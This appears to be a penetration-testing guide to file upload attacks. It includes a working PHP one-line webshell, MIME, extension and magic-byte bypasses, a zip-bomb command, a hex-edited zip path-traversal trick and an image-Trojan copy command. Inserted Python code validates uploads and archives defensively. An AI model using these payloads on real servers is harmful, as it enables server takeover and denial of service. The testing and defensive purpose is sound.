
I. Attack scenarios
- Upload webshell directly
  - Description: Many application systems or components provide a file upload function. If the type of uploaded file is not restricted, a webshell can be uploaded at will and the entire server taken over.
  - Test method: First, find every page that accepts a file upload and determine the server-side technology the application uses (jsp, php, asp, etc.). Upload a one-sentence Trojan directly, then connect to it with a one-sentence Trojan client (China Chopper, the "Chinese kitchen knife") to obtain the webshell. Taking php as an example, prepare a php one-sentence Trojan:
    <?php
    @eval($_POST['value']);
    ?>
    After uploading, note the upload path, connect to it with China Chopper, and execute commands to obtain the webshell.
- Bypass client-side verification
  - Description: If only client-side script such as JavaScript verifies the extension of the uploaded file, the check is easily bypassed with a proxy tool.
  - Test method: Suppose the application verifies uploads and refuses script files such as jsp, php and asp. Upload a script file first and look at the response. With client-side verification a dialog usually pops up saying the upload is illegal, with no sign that the server processed the request. To confirm, inspect the page code in the browser: in Chrome, right-click the upload button, choose Inspect, and read the JavaScript handling logic. If the extension check lives in the JavaScript, use Burp Suite to intercept a legitimate upload request and change the file extension.
- Bypass verification via case, encoding, server characteristics, etc.
  - Description: A simple extension filter can be circumvented by changing the case of the extension, encoding it, or relying on web server features.
  - Test method: Bypass the check through the file name, i.e. by varying the case or encoding of the extension or relying on server-specific handling of it, as in the description.
- Upload a large compressed file
  - Description: Many applications allow compressed uploads and limit the size of the compressed file. By creating a highly compressed archive, several gigabytes can be packed into a few megabytes so that the size limit is not exceeded, and the file is decompressed in the background. Decompression puts enormous pressure on CPU, memory and disk, which may cause a denial of service.
  - Test method: First, on an operating system such as Kali Linux or BT Linux, create a file with a compression ratio of about 1000:1 with the following command:
    dd if=/dev/zero count=$((1024*1024)) bs=1024 | zip -9 big.zip -
    This yields a very large archive in a small file. Finally, upload big.zip and check whether CPU, memory and disk usage spikes or hits a bottleneck.
- Change the upload path
  - Description: Many applications allow compressed uploads and limit the archive's size, but neither verify the file types inside the archive nor restrict the paths the entries are extracted to, allowing an attacker to change the extraction path and plant a webshell.
  - Test method: Suppose the webshell is to be written to the path ../../home/test/test.php. Prepare a webshell with a .txt extension and an arbitrary file name whose length equals the length of the target path, for example:
    ../../home/test/test.php
    11111111111111111111.txt
    Both are 24 characters long. Compress the txt file, then open the archive in a hex editor and change the entry name 11111111111111111111.txt to ../../home/test/test.php. Save and upload it; the application extracts the webshell to that path, which yields the webshell.
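For the two archive scenarios above (the decompression bomb and the renamed entry that escapes the extraction directory), here is an added server-side pre-extraction check; it is example code written for this page, not from the original, and the size/ratio limits, the allowed inner extensions and the function names are assumptions.

```python
import io
import os
import posixpath
import zipfile

# Limits are assumptions chosen for this example, not values from the page.
MAX_TOTAL_UNCOMPRESSED = 50 * 1024 * 1024  # 50 MiB across the whole archive
MAX_RATIO = 100  # inflated bytes / compressed bytes allowed per entry
ALLOWED_INNER_EXTS = (".jpg", ".png", ".gif", ".txt")

def entry_escapes(name: str) -> bool:
    """True if an entry would land outside the extraction root (e.g. a hex-edited
    name like ../../home/test/test.php, an absolute path or a drive letter)."""
    if not name or name.startswith(("/", "\\")) or ":" in name.split("/")[0]:
        return True
    norm = posixpath.normpath(name.replace("\\", "/"))
    return norm == ".." or norm.startswith("../")

def check_archive(data: bytes) -> list:
    """Reasons an uploaded zip must be rejected ([] = acceptable); every entry is
    checked before extraction and inflated size is measured, not read from headers."""
    problems, budget = [], MAX_TOTAL_UNCOMPRESSED
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if entry_escapes(info.filename):
                problems.append(f"path traversal: {info.filename}")
                continue
            if info.is_dir():
                continue
            if os.path.splitext(info.filename)[1].lower() not in ALLOWED_INNER_EXTS:
                problems.append(f"disallowed type inside archive: {info.filename}")
            inflated = 0
            with zf.open(info) as src:
                while chunk := src.read(65536):
                    inflated += len(chunk)
                    if inflated > budget:  # stop inflating once the budget is spent
                        problems.append(f"decompressed size over limit: {info.filename}")
                        break
            budget = max(0, budget - inflated)
            if info.compress_size and inflated / info.compress_size > MAX_RATIO:
                problems.append(f"decompression-bomb ratio: {info.filename}")
    return problems

def build_zip(entries: dict) -> bytes:
    """Build an in-memory deflate zip from {name: bytes} (constructed test input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()
```

Pair this with extraction into a fresh directory under a dedicated, non-web-served root; the path check is what keeps the 24-character renamed entry from landing in /home/test.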
- Bypass MIME type detection
  - Description: Some applications verify uploads only by checking the file's MIME type. For example, the MIME type of a jpg file is image/jpeg and that of an html file is text/html. In this case, changing the MIME type in the upload request is enough to bypass the check.
  - Test method: Taking php as an example, suppose the upload control only accepts gif files. Upload a php file directly and intercept the request with Burp Suite. In the request, the Content-Type of the file part reads text/plain (other values may appear). Change it to image/gif to bypass the check.
- Bypass file content verification
  - Description: Sometimes the server checks the file header, for example by calling getimagesize() to verify that an upload is an image. Prepending image format bytes to the file content bypasses this header check.
  - Test method: Take an image upload function as an example. Prepend image header bytes to the attack script: for jpg add FF D8 FF E0 00 10 4A 46 49 46, for png add 89 50 4E 47, for gif add 47 49 46 38 39 61, and rename the script test.php to test.jpg. Upload it and access the attack script; if it executes, the attack succeeded.
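As the server-side counterpart to the client-side, extension, MIME and file-header bypasses above, here is an added validation routine (example code, not from the original page): it case-folds the extension against an allowlist, ignores the client-sent Content-Type, checks the magic bytes the text lists, and also scans for embedded script tags so that a file with an image header glued in front of a script is still caught. The allowlist policy and the function names are assumptions.

```python
import hashlib
import os
import re

# Allowlist for an image-upload endpoint (assumed policy for this example):
# case-folded extension -> the magic bytes the content must start with.
ALLOWED = {
    ".jpg": (b"\xff\xd8\xff",),          # JPEG SOI marker (JFIF/Exif follow)
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
# A script opening tag anywhere inside an "image" marks it as a polyglot.
SCRIPT_TAG = re.compile(rb"<\?php\b|<\?=|<%[@!=]?\s*[a-z]|<script\b", re.IGNORECASE)

def validate_upload(filename: str, data: bytes) -> str:
    """Return "ok" or the reason the upload is rejected.
    Only the bytes and the allowlisted, case-folded extension are consulted;
    the client-sent Content-Type is ignored because it is attacker-controlled."""
    base = os.path.basename(filename.replace("\\", "/"))
    # Reject null bytes, trailing dots/spaces and double extensions (a.php.jpg).
    if "\x00" in base or base != base.rstrip(". ") or base.count(".") != 1:
        return "rejected: unsafe file name"
    ext = os.path.splitext(base)[1].lower()  # .PHP / .pHp -> .php
    if ext not in ALLOWED:
        return f"rejected: extension {ext!r} not allowed"
    if not data.startswith(ALLOWED[ext]):
        return "rejected: content does not match declared image type"
    if SCRIPT_TAG.search(data):
        return "rejected: script tag embedded in image"
    return "ok"

def stored_name(data: bytes, ext: str) -> str:
    """The server picks the on-disk name: content hash plus the validated
    extension, so a client-chosen name never reaches the filesystem."""
    return hashlib.sha256(data).hexdigest()[:32] + ext
```

Tag matching is only a heuristic; the stronger controls are re-encoding the image server-side and storing uploads where the web server will not execute scripts.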
- Execute an image Trojan
  - Description: Sometimes none of the above methods lets you upload a php, jsp or asp webshell. Then try building an image Trojan with the copy command and executing it through a file inclusion vulnerability to obtain the webshell.
  - Test method: Take php as an example. Prepare a picture and a one-sentence Trojan and put the two files in the same directory. Open cmd, change into that directory, and run: copy 1.gif /b + 1.php /a 2.gif
    The image Trojan 2.gif is now ready. Upload it, then look for a file inclusion vulnerability and include the image Trojan directly. In php the URL of the inclusion point typically looks like 127.0.0.1/test/test.php?file=2.gif; put this link into China Chopper to obtain the webshell.
II. Impact
An attacker could upload webshells at will and thereby take control of the server.